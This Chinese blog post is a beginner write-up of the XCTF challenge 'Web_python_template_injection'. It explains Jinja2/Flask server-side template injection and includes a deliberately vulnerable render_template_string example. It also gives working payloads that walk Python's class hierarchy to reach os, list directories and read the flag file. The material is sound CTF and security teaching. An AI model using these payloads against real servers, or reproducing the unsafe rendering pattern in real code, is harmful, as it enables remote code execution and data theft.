首页 > 编程语言 >攻防世界Web_python_template_injection(新手模式)

攻防世界Web_python_template_injection(新手模式)

时间:2024-07-19 22:07:49浏览次数:17  
标签:__ Web .__ python 模版 __.__ template class

二、Web_python_template_injection

1.基本知识点

模版引擎

模版引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易,但是模板引擎也拓宽了我们的攻击面,注入到模板中的代码可能会引发RCE或者XSS
Jinja2模板引擎中,{{}}变量包裹标识符{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

flask

Flask是一个非常小的PythonWeb框架,被称为微型框架;只提供了一个稳健的核心,其他功能全部是通过扩展实现的;意思就是我们可以根据项目的需要量身定制,也意味着我们需要学习各种扩展库的使用。

Python模版注入漏洞

Python模版注入漏洞(Template Injection Vulnerability)是一种安全漏洞,通常发生在使用模版引擎(如Jinja2Django模版等)渲染用户提供的输入时。当用户输入未经过充分过滤或验证的内容被直接插入到模版中时,攻击者可以利用这一漏洞在服务器端执行恶意代码或进行其他形式的攻击。

举个例子,假设有如下服务端代码:

from flask import Flask, request, render_template_string
#创建一个Flask应用实例,命名为app
app = Flask(__name__)
#这是一个路由装饰器,定义了当访问根URL(/)时,将调用index函数处理请求。 
@app.route('/')
def index():
#从URL参数中获取名为template的值,并赋给变量template_input。
    template_input = request.args.get('template')
    return render_template_string(template_input)
 
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8888, debug=True)

我们将模版内容传递到服务端,服务端会执行模板内容中的代码,比如我们传入一条{{ 7 * 7}}的模板参数,发现返回值为49,说明什么?说明{{ 7 * 7}}这条指令已经在服务端执行了。

Untitled

这就是python模板注入的基本原理。

常用类

__class__  返回类型所属的对象

__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析

__base__   返回该对象所继承的基类

(__base__和__mro__都是用来寻找基类的)

__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__  类的初始化方法

__globals__  对包含函数全局变量的字典的引用

__builtins__  builtins就是引用

获取基类(父类)的几种方法:
[].__class__.__base__

''.__class__.__mro__[2]

().__class__.__base__

{}.__class__.__base__

request.__class__.__mro__[8]   

[].__class__.__bases__[0]

2.解题过程

1.首先检测一下是否有模版注入。用URL编码后的{{30+50}}进行检测。返回80,说明执行成功。

Untitled

2.获取基类

Untitled

3.获取该基类下的子类

{{[].__**class__**.__**base__**.__**subclasses__**()}}

Untitled

4.[71]是site._Printer类的出现位置,前面共有71个逗号,是第72个,索引值为 71 , 索引从0开始。

列出当前目录中的文件和目录:

{{[].__**class**__.__**base**__.__**subclasses**__()[71].__**init__**.__**globals__**['os'].listdir('.')}}

Untitled

5.找到文件名后,利用第41项的file类读取文件,得到flag

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

Untitled

参考文章:

https://blog.csdn.net/Myon5/article/details/130072619?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522172138734316800182747973%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=172138734316800182747973&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_click~default-2-130072619-null-null.142v100pc_search_result_base1&utm_term=python template injection&spm=1018.2226.3001.4187

标签:__,Web,.__,python,模版,__.__,template,class
From: https://www.cnblogs.com/lxxa/p/18312470

相关文章

  • 零基础入门:创建一个简单的Python爬虫管理系统
    摘要:本文将手把手教你,从零开始构建一个简易的Python爬虫管理系统,无需编程基础,轻松掌握数据抓取技巧。通过实战演练,你将学会设置项目、编写基本爬虫代码、管理爬取任务与数据,为个人研究或企业需求奠定坚实基础。一、前言:数据之海,从何舀水?在这个信息爆炸的时代,数据如同海洋,而......
  • 又来了哦,Python函数 | |
    1.变量的作用域(global与nonlocal)Python中的变量作用域可以通过global和nonlocal关键字来管理。‌全局变量:‌在Python中,‌使用global关键字可以在函数内部访问和修改全局变量。‌当需要在函数内部对全局变量进行操作时,‌应使用global关键字声明该变量,‌这样函数内部的操作就......
  • 【Loading 4/75】Web_SQLi-Labs_WriteUp
    Less-1_GET-Errorbased-Singlequotes-String题目分析根据标题“GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)”可以猜到本题的闭合方法为单引号闭合,但保险起见咱还是走一遍流程。根据页面给出的提示信息“PleaseinputtheIDasparameterwith......
  • python_day7
    数据类型​ 之前数字/字符串类型 之后字典\布尔类型列表类型使用列表的几个函数先建一个列表如name_list=['linda','david','louis','kevin','linda]取值时,直接print(name_list[0])或者选取其他的数字替换0,也可以倒数取-1,-2...,还能[0:2],[-3:]这样进行选取几个......
  • Javaweb项目|电子商城购物平台的设计与开发+ssm小程序
    Javaweb项目|电子商城购物平台的设计与开发+ssm小程序收藏点赞不迷路 关注作者有好处文末获取源码一、系统展示二、万字文档展示 基于电子商城购物平台的设计与开发+ssm小程序开发语言:Java数据库:MySQL技术:Spring+SpringMVC+MyBatis+Vue工具:IDEA/Ecilpse、Navicat......
  • JavaScript 异步编程:提升现代Web应用的性能与体验
    异步概念解析在编程领域,异步(Asynchronous)是一种允许程序继续执行而不等待某个操作完成的机制,与之相反的是同步(Synchronous),其中程序会暂停并等待每个操作完成才继续下一步。异步编程的核心优势在于提高了应用程序的响应性和资源利用率。想象一下,你正在厨房准备晚餐,同步操作......
  • 基于Python+Django的智能水果销售系统设计与实现(源码+数据库+讲解)
    文章目录前言详细视频演示项目运行截图技术框架后端采用Django框架前端框架Vue可行性分析系统测试系统测试的目的系统功能测试数据库表设计代码参考数据库脚本为什么选择我?获取源码前言......
  • Python写表情包搜索工具(非常详细)零基础入门到精通,收藏这一篇就够了
    首先,我们导入了一些必要的库。requests库用于发送HTTP请求,json库用于处理JSON数据,tkinter库用于创建GUI界面,PIL库用于处理图像,io库用于在内存中读写数据。然后,我们定义了一个常量ITEMS_PER_PAGE,表示每页显示的图片和链接数量。接下来,我们定义了一个名为search_emoji的函数......
  • python实现快速幂
    若需要计算a^b,如果使用循环来计算显然效率是很低的以下有三种方法实现快速幂方法一,python自带函数pow(a,b,mod),其中a为底数,b为指数,mod是对该数取模,mod参数有时候可以不传a=pow(5,9)方法二,利用递归实现快速幂,该方法需要注意分类讨论,考虑到指数为0,指数为1以及指数是奇数的情......
  • Python中turtle库效果展示
        前言    Python因其众多的第三方库而闻名,其中,用于绘制图形的turtle库由于其简单易用和方便性得到了广泛的青睐。笔者对此有些许兴趣,欲在后来的文章中对此展开学习,便先发布一篇预热文章,展现Python中使用turtle所能达到的效果如何。    内容概要......